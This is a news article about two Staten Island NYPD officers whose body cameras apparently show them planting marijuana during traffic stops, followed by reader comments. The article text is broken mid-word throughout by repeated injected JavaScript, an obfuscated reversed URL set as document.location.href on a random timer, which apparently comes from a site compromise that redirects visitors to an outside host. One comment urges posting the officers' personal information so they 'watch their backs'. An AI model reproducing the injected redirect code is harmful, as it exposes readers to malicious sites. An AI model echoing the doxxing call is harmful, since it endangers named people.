When a police officer in Staten Island was caught by his own body camera in the apparent act of planting marijuana in the car of a group of young men, the video evidence against him was strong enough toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to prompt prosecutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tors in the resulting case toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to throw out the marijuana charge in the middle of a pretrial hearing. A judge cut short his testimony, and prosecutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tors recommended he get a lawyer. But an internal review by the New York Police Department found that no misconduct had occurred.

Now a new video — published exclusively by The Intercept — shows the same officer again seemingly planting marijuana during a different traffic stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top just a few weeks after the first. On both occasions, two officers — Kyle Erickson and Elmer Pastran, of the 120th Precinct — stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}topped cars for minor traffic infractions, then claimed the vehicles smelled like marijuana. In both instances, body camera footage shows the officers extensively searching the cars for several minutes and finding nothing. In the first incident, in February 2018, Erickson’s body camera is then suddenly switched off and then back on just as he discovers a marijuana cigarette that did not appear toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to be there when his partner was first searching the car.

The new video raises questions about the credibility of internal review processes and highlights the lack of transparency in cases of police misconduct. The video, which didn’t emerge for nearly two years, also underscores the limited information available not just toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to the public but also defendants, and validates criticism by police accountability advocates that body cameras are of no use if the evidence they capture remains inaccessible.

These officers need to be in jail minimum 10 years. No way should they be freed for a long time.

  10. David McGill says:

BLUE NAZIS SCUMBAGS, good cops need to stop the bad cops, this is a prime example of why the people don't care when cops get killed and have no faith or TRUST in law enforcement. Post all their personal information on social media, let them watch their backs.

  11. WINTER 935 says:

The ones that say we need to find something or they have to have something are the ones that plant drugs on people almost every day

  12. Tuck’s Girl says:

Wow. What in the f**k will these officers have to do to get fired? How do they just keep getting away with this? There was no wrongdoing found in the first incident. But when in court, the judge tells him to get a lawyer…and that still wasn’t enough. They are probably planting something and ruining someone’s life as I sit here and type this out. May that whole department rot in hell. This is outrageous.

  13. Tuck’s Girl says:

The urge to plant something and ruin someone’s life was so great that they opened up a fresh wound on this man. And he was handcuffed to a hospital bed the whole time he was there. These 2 guys are not only shitty officers, they are shitty human beings. I hope they end up rotting in jail and when that’s done, I hope they rot in hell. FTP. Especially these 2 POS losers.

  14. uu uu says:

What these cops did does not at all surprise. Has happened to black ppl and brown, poor ppl, women since this country's inception. What I DON'T GET is do these beast just walk around with buds and "flakes" in their pockets? Like how does that happen. Damn. That is a part of a larger conspiracy and tactical way they operate. Yes, the community is Right.

There's no such thing as a good cop. If even ONE of your colleagues is engaging in this shady shit and is getting away with it, then all of you are complicit. This is why I never shed a tear for a dead cop.
